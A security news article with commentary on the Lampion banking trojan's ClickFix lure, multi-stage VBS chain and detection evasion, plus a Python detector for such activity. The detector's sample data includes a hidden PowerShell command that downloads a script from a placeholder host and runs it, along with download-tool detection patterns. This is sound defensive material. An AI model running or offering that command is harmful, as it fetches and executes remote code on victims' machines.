
Introduction: The Rise of Brazil’s Silent Cyber Predator
Cybercrime has entered a new phase in Brazil. What was once the playground of amateur hackers has now become a sophisticated hub for financial malware. Among these digital predators, the Lampion banking trojan stands out as one of the most cunning. Originally designed to steal banking credentials, this malicious tool has evolved significantly, now employing a new infection strategy known as ClickFix — a manipulative social engineering technique that tricks victims into executing malware themselves.
Since mid-2024, this upgraded campaign has spread rapidly across Portuguese-speaking nations, blending human deception with technical innovation. Behind the scenes, organized Brazilian threat actors have crafted a web of phishing emails, fake receipts, and PowerShell scripts that quietly steal data while slipping past modern antivirus tools.
Lampion Trojan: The Evolution of Deception
The Lampion campaign began as a relatively standard phishing operation. Cybercriminals used compromised email accounts to send messages disguised as payment confirmations or bank transfer receipts. Subject lines like “Proof for verification” or “Payment receipt follows” were meticulously crafted to appear authentic, complete with timestamps and document numbers to reinforce legitimacy.
Each message came with a ZIP attachment, launching a complex multi-stage infection chain when opened. Inside these ZIP files lay HTML documents that encouraged users to follow simple instructions — but this was where the deception reached its peak.
The ClickFix Revolution in Social Engineering
Starting in December 2024, the attackers abandoned the old method of embedding malicious links. Instead, they adopted ClickFix, a social engineering trick first observed by Proofpoint researchers in mid-2024. When victims opened the HTML file, they were met with a message asking them to copy and paste a command into the Windows “Run” box. Believing it was necessary to open a document, victims unknowingly triggered a PowerShell command that downloaded a Visual Basic Script (VBS) file — the first domino in a deadly sequence.
This approach was brilliant in its simplicity. By making the victim manually execute the code, the attackers bypassed browser-based defenses and most security filters. The malware didn’t rely on clicks or macros — it relied on trust.
Multi-Stage Infection Chain
The infection process unfolded in three distinct VBS stages before the Lampion payload took control.
Stage One: The initial VBS file, introduced in June 2025, created persistence by copying itself into the Windows Startup folder via scheduled tasks. Its code was intentionally filled with garbage variables and obfuscated strings to resist reverse engineering.
Stage Two: This script performed HTTP HEAD requests to check communication paths and then downloaded the next stage in small, unrecognizable data chunks.
Stage Three: The final VBS acted as the dropper for the actual Lampion malware, removing traces of the previous files and downloading a massive 700MB DLL payload — bloated deliberately to evade detection platforms like VirusTotal, which has file size limits.
Stealth, Persistence, and Targeted Attacks
Once executed, the malware collected a wide range of system details — machine ID, username, antivirus software, OS type, and more — encoding everything in Base64 before sending it to a command-and-control (C2) server.
Lampion specifically hunted Portuguese banking credentials, a niche that made it both regionally targeted and devastatingly effective. The malware could forcibly close popular browsers including Edge, Chrome, Firefox, Opera, and Brave, ensuring victims would re-enter credentials on compromised pages.
Its infrastructure used multiple VPS hosts, rotating IP addresses, and cloud storage to distribute files. The core C2 server at IP 83.242.96[.]159 has been active since 2024, suggesting a resilient and well-funded operation.
Low Detection Rates, High Impact
Even after months of activity, detection rates remain alarmingly low. The initial ZIP and HTML stages often slip past all major antivirus tools. As of October 2025, only eight antivirus engines identified the first VBS stage as malicious. This low visibility, combined with the use of VMProtect and massive file sizes, gives Lampion near-invisibility in many corporate and consumer environments.
This strategic stealth has made Lampion one of the most enduring banking trojans in recent Brazilian cybercrime history — and one that continues to evolve faster than security solutions can adapt.
What Undercode Says:
The evolution of Lampion represents a critical moment in the ongoing war between cybercriminals and defenders. Unlike traditional phishing attacks that rely on users clicking malicious links, ClickFix transforms social engineering into a direct command-based attack vector. It blurs the line between human error and system vulnerability.
From a cybersecurity perspective, Lampion’s latest version highlights three alarming shifts:
Human-Driven Execution: By instructing victims to manually run PowerShell commands, attackers bypass many automated security controls. It’s psychological hacking at its finest — turning the victim into an unwitting accomplice.
Massive Payload Obfuscation: The 700MB DLL payload is a technical masterpiece of evasion. By inflating its size and using VMProtect, Lampion avoids upload and scanning limitations, effectively hiding in plain sight.
Localized Focus: The trojan’s targeting of Portuguese-speaking users reflects a broader trend of geo-targeted malware, where attackers focus on cultural and linguistic familiarity to increase success rates.
This is not just about stolen bank credentials. Lampion’s infrastructure and tactics suggest a broader goal — potentially building a botnet or credential marketplace. The C2 persistence and layered VBS structure mirror advanced modular malware frameworks, similar to those used by nation-state actors.
Security researchers must also note that ClickFix is not exclusive to Lampion. It can easily be adapted to deliver ransomware, spyware, or corporate data stealers. The biggest threat is not the trojan itself, but the social engineering model it pioneers.
Organizations across Portugal and Brazil need to retrain employees to recognize social engineering beyond email links. Awareness campaigns should emphasize that legitimate documents never require users to paste commands into the “Run” window.
For defenders, proactive detection through behavioral analytics and endpoint monitoring will be essential. Static signature-based tools are no longer enough. As Lampion evolves, it serves as a warning: the next era of cybercrime will weaponize human psychology as much as technology.
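One defender-side check for the two behaviours described above (a shell launched from the Run dialog that pulls a remote file, and a script host executing a dropped .vbs), written here as an added example rather than code from the article or from any vendor. The events are constructed Sysmon-style process-creation records, and the 203.0.113.5 address is a documentation placeholder.

```python
"""Flag ClickFix-style execution chains in process-creation telemetry."""
import re

# Constructed sample events (not real telemetry): parent process, child image, command line.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe",            # Win+R launches via explorer.exe
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c \"iwr hxxp://203.0.113.5/r.vbs -OutFile $env:TEMP\\r.vbs; wscript $env:TEMP\\r.vbs\""},
    {"id": 2, "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": "wscript C:\\Users\\u\\AppData\\Local\\Temp\\r.vbs"},
    {"id": 3, "parent": r"C:\Windows\explorer.exe",            # benign: a user listing a folder
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Get-ChildItem C:\\Reports"},
    {"id": 4, "parent": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": "wscript C:\\Users\\u\\Downloads\\Comprovativo.vbs"},
]

RUN_DIALOG_PARENTS = ("explorer.exe",)                      # what a pasted Run command is spawned from
SHELL_IMAGES = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
# A download cradle in the command line is what separates a ClickFix paste from an admin's ad-hoc shell.
CRADLE_RE = re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget|start-bitstransfer)\b", re.I)
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-ep\s+bypass|-enc\b", re.I)
VBS_RE = re.compile(r"\.vbs\b", re.I)
USERDIR_RE = re.compile(r"\\(temp|downloads)\\", re.I)      # dropped stages land in user-writable dirs


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the findings for one process-creation event (empty list if nothing suspicious)."""
    findings = []
    parent, image, cmd = basename(event["parent"]), basename(event["image"]), event["cmdline"]
    if parent in RUN_DIALOG_PARENTS and image in SHELL_IMAGES and CRADLE_RE.search(cmd):
        findings.append("clickfix_cradle")          # shell from the Run dialog fetching remote content
        if HIDDEN_RE.search(cmd):
            findings.append("hidden_window")        # operator hid the console from the victim
    if image in SCRIPT_HOSTS and VBS_RE.search(cmd) and (parent in SHELL_IMAGES or USERDIR_RE.search(cmd)):
        findings.append("vbs_stage_launch")         # script host running a .vbs dropped by a shell/mail client
    return findings


def scan(events):
    """Map event id -> findings for every event that produced at least one finding."""
    hits = {}
    for event in events:
        found = classify(event)
        if found:
            hits[event["id"]] = found
    return hits
```

Correlating a `clickfix_cradle` hit with a `vbs_stage_launch` whose parent is the same shell process is the higher-confidence signal; event 3 shows why the cradle condition is needed to keep everyday explorer-to-PowerShell launches out of the alert queue.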
🔍 Fact Checker Results
✅ Lampion is confirmed to use the ClickFix method for infection, as documented by Proofpoint.
✅ Campaigns have targeted Portuguese-speaking regions since at least mid-2024.
❌ No verified evidence currently links Lampion directly to ransomware operations.
📊 Prediction
💻 Expect ClickFix-inspired attacks to surge in 2026, with threat actors in Europe and South America adopting similar command-based lures.
🕵️♂️ Lampion’s developers will likely integrate AI-driven anti-detection tools, making static defenses obsolete.
🌐 Security firms may soon treat ClickFix as a new social engineering category, not just a malware delivery technique.
References:
Reported By: cyberpress.org